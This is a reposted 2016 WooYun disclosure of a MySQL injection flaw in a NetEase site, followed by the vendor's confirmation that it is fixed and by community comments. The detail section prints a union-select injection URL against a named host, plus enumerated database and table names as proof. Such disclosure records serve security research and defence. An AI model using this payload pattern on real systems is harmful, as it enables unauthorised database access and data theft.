网易某站点MySQL报错注入漏洞

admin
admin
admin
141402
文章
117
评论
2017年4月7日06:13:33评论360 views字数 202阅读0分40秒阅读模式
摘要

2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-31: 厂商已经确认,细节仅向厂商公开
2016-04-10: 细节向核心白帽子及相关领域专家公开
2016-04-20: 细节向普通白帽子公开
2016-04-30: 细节向实习白帽子公开
2016-05-15: 细节向公众公开

漏洞概要 关注数(43) 关注此漏洞

缺陷编号: WooYun-2016-189928

漏洞标题: 网易某站点MySQL报错注入漏洞

相关厂商: 网易

漏洞作者: lijiejie网易某站点MySQL报错注入漏洞

提交时间: 2016-03-28 11:29

公开时间: 2016-05-15 10:40

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 12

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

7人收藏

漏洞详情

披露状态:

2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-31: 厂商已经确认,细节仅向厂商公开
2016-04-10: 细节向核心白帽子及相关领域专家公开
2016-04-20: 细节向普通白帽子公开
2016-04-30: 细节向实习白帽子公开
2016-05-15: 细节向公众公开

简要描述:

网易某站点MySQL报错注入

详细说明:

code 区域 
http://hermes.da.netease.com/account/getAccountCount?accountId=' and 1=2 union select user(),2,3,4,5,6%23&productId=0

参数accountId可注入,MySQL报错注入。

网易某站点MySQL报错注入漏洞

漏洞证明:

code 区域 
available databases [3]:
 [*] hermes
 [*] information_schema
 [*] test
code 区域 
Database: hermes
 [9 tables]
 +-----------------------+
 | db_info               |
 | hive_info             |
 | sys_account_authority |
 | sys_account_info      |
 | sys_product           |
 | sys_role              |
 | task_extra            |
 | task_info             |
 | time_job              |
 +-----------------------+

修复方案:

参数过滤,转义

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-03-31 10:34

厂商回复:

该问题已修复,感谢您对网易产品的关注。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-03-28 11:31 | Aasron ( 普通白帽子 | Rank:905 漏洞数:163 | raw_input("你知道我要输入什么?"))

    1

    附验证脚本

  2. 2016-03-28 11:31 | 木有鱼丸 ( 路人 | Rank:16 漏洞数:4 | 没有鱼丸。)

    1

    网易我记得去年还是前年,泄露数据库了,然后不承认泄露,然后还吹牛逼,国家级什么什么安全。。。还拿出证书了。。。 现在被打脸了有没有?

  3. 2016-03-28 11:32 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒,就没有什么事是【撸串...)

    1

    啪啪啪

  4. 2016-03-28 11:33 | 奶嘴 ( 普通白帽子 | Rank:414 漏洞数:110 | 17岁的毛孩 有些厂商故意加你好友,和你聊...)

    1

    lijiejie,我在爱奇艺SRC的洞您还没给我审核呢

  5. 2016-03-28 11:37 | lijiejie 网易某站点MySQL报错注入漏洞 ( 核心白帽子 | Rank:2527 漏洞数:325 | Just for fun.)

    1

    @奶嘴 你看看评论,你只附了截图,补充一下超链接。 网易某站点MySQL报错注入漏洞

  6. 2016-03-28 13:36 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

    1

    @lijiejie 泥萌src缺人不(*_*)

  7. 2016-03-28 13:39 | 奶嘴 ( 普通白帽子 | Rank:414 漏洞数:110 | 17岁的毛孩 有些厂商故意加你好友,和你聊...)

    1

    @坏男孩-A_A 大神 受下我的单膝

  8. 2016-03-28 13:52 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

    1

    @奶嘴 大牛,你艾特错人啦(*_*)

  9. 2016-03-28 13:59 | 奶嘴 ( 普通白帽子 | Rank:414 漏洞数:110 | 17岁的毛孩 有些厂商故意加你好友,和你聊...)

    1

    泥萌src缺人不(*_*) 没事,,锻炼技术

  10. 2016-03-28 14:14 | 雅柏菲卡 ( 普通白帽子 | Rank:1299 漏洞数:259 | 雙魚座聖鬥士雅柏菲卡)

    1

    李姐姐 必须关注

  11. 2016-03-29 11:28 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

    1

    @lijiejie @奶嘴 求带走

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin